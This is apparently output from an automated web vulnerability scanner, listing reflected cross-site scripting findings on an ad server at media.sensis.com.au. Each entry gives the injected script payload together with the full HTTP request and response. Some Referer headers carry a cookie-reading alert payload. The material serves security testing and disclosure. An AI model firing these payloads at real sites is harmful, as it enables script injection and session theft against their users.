The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfa6c"><script>alert(1)</script>4a6b454e377 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=955810753905/SITE=TEL.BIGPOND.GAMEARENA.GAMING/AREA=ENTERTAINMENT.BIGPOND.GAMING.GAMEARENA.ALLPLATFORMS.NEWS/AAMSZ=100x29/POSITION=headernav/pageid=260571614373?bfa6c"><script>alert(1)</script>4a6b454e377=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.gamearena.com.au/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:54 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 473 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6d7db"><script>alert(1)</script>2b3b5278dab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver6d7db"><script>alert(1)</script>2b3b5278dab/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:55 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 693 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3657d"><script>alert(1)</script>1faa0a4ddec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random3657d"><script>alert(1)</script>1faa0a4ddec=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:56 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 467 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.678. http://media.sensis.com.au/hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69d9a"><script>alert(1)</script>fb66149c7fa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=972102090471/SITE=TEL.BIGPOND.PORTAL.ENTERTAINMENT/AREA=ENTERTAINMENT.BIGPOND.ENTERTAINMENT.BIGPOND.OTHER/AAMSZ=100x29/POSITION=headernav/pageid=500672107272?69d9a"><script>alert(1)</script>fb66149c7fa=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://bigpondvideo.com/bphf/header/adh.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5; LE2=mkowC1+5a8+31+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:53 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 470 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 888fe"><script>alert(1)</script>1510834deef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver888fe"><script>alert(1)</script>1510834deef/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:40 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d98"><script>alert(1)</script>13a8b4f816b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random44d98"><script>alert(1)</script>13a8b4f816b=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:41 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.681. http://media.sensis.com.au/hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e602f"><script>alert(1)</script>5b976c84b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=972527163872/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=4x1/POSITION=ABV1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?e602f"><script>alert(1)</script>5b976c84b9=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:39 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 435 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6332b"><script>alert(1)</script>d1fc9b59ecc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver6332b"><script>alert(1)</script>d1fc9b59ecc/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:36 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 503 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8938a"><script>alert(1)</script>6cf6331c17c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random8938a"><script>alert(1)</script>6cf6331c17c=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:37 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 503 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.684. http://media.sensis.com.au/hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 640d5"><script>alert(1)</script>475c70acbff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=975042877402/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=332x122/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=746311742193?640d5"><script>alert(1)</script>475c70acbff=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:35 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 506 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29cb5"><script>alert(1)</script>5373d820f93 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver29cb5"><script>alert(1)</script>5373d820f93/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:46 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78925"><script>alert(1)</script>9424791b8b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random78925"><script>alert(1)</script>9424791b8b6=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:47 GMT X-DirectServer: DS2 Content-Type: text/html Content-Length: 433 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
2.687. http://media.sensis.com.au/hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cd1"><script>alert(1)</script>dcd269cb395 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_random=980327086859/SITE=3RD.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=1x1/POSITION=BLW1/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=122954556302?48cd1"><script>alert(1)</script>dcd269cb395=1 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+38lAhp4+5M51004+5
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:45 GMT X-DirectServer: DS3 Content-Type: text/html Content-Length: 436 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 227fc"><script>alert(1)</script>14d14ed3ca1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver227fc"><script>alert(1)</script>14d14ed3ca1/acc_random=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:23 GMT X-DirectServer: DS1 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0dd3"><script>alert(1)</script>35b30b58a96 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /hserver/acc_randomd0dd3"><script>alert(1)</script>35b30b58a96=983184589154/SITE=3RD.BPPROMO.VIRTUALMEDICALCENTRE.HEALTH/AREA=HEALTH.VIRTUALMEDICALCENTRE.HOME/AAMSZ=300x70/POSITION=3/KEYWORD=DEFAULT.HOME/CATEG=OTHER_DEMOGRAPHIC/SITE_CONTENT=OTHER_TREATMENT/pageid=146995204521 HTTP/1.1 Host: media.sensis.com.au Proxy-Connection: keep-alive Referer: http://www.virtualmedicalcentre.com/?21bba%22%3E%3Cscript%3Ealert(1)%3C/script%3E10e5e8898c1=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: GUID=0009D36D26800CEB6E62278961626364; LE3=+58f9hpqtK+314+4
Response
HTTP/1.1 200 OK Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86) Date: Tue, 23 Nov 2010 03:12:24 GMT X-DirectServer: DS5 Content-Type: text/html Content-Length: 511 Pragma: no-cache Cache-control: no-cache P3P: policyref="http://medrx.sensis.com.au/w3c/p3policy.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa PSAa PSDa HISa OTPa OUR IND UNI COM NAV INT STA PRE LOC" Connection: close
